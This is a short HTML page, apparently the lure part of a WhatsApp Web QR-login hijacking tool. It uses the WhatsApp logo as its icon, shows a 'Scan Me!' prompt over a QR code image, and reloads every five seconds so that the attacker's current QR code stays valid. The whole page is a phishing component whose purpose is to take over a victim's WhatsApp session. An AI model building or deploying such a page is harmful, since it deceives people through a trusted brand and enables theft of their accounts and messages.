<!DOCTYPE html>
<html>

<link rel="icon" href="https://logo-logos.com/wp-content/uploads/2016/10/WhatsApp_logo_icon.png">
<link rel="stylesheet" href="style.css">
<title> WhatsApp Web *FAKE* </title>


<body>

<h1>WhatsApp Web Session Hijcation</h1>
<h2>Don't be afraid, Scan Me!</h2>
<img src="QR_code.png" alt="QR code">

<!-- Refresh page every 5 seconds to keep the QR code updated -->
<script language="javascript"> 
setInterval(function(){
   window.location.reload(1);
}, 5000);
</script>

</body>
</html>